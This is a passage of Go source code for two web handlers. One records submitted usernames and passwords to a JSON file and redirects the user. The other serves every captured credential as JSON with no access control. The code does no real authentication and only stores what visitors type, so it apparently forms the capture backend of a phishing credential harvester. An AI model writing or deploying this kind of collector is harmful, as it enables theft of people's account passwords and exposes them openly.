package main

import (
	"encoding/json"
	"io/ioutil"
	"log"
	"net/http"
)

func passHandler(resp http.ResponseWriter, req *http.Request) {
	un := req.FormValue("username")
	pw := req.FormValue("password")
	c := Cred{un, pw}
	m.Lock()
	defer m.Unlock()
	creds = append(creds, c)
	b, err := json.Marshal(creds)
	if err != nil {
		log.Fatal(err)
	}
	err = ioutil.WriteFile(*dbFile, b, 0644)
	if err != nil {
		log.Fatal(err)
	}
	http.Redirect(resp, req, "/", http.StatusTemporaryRedirect)
}

func credHandler(resp http.ResponseWriter, req *http.Request) {
	b, err := json.Marshal(creds)
	if err != nil {
		log.Fatal(err)
	}
	resp.Write(b)
}
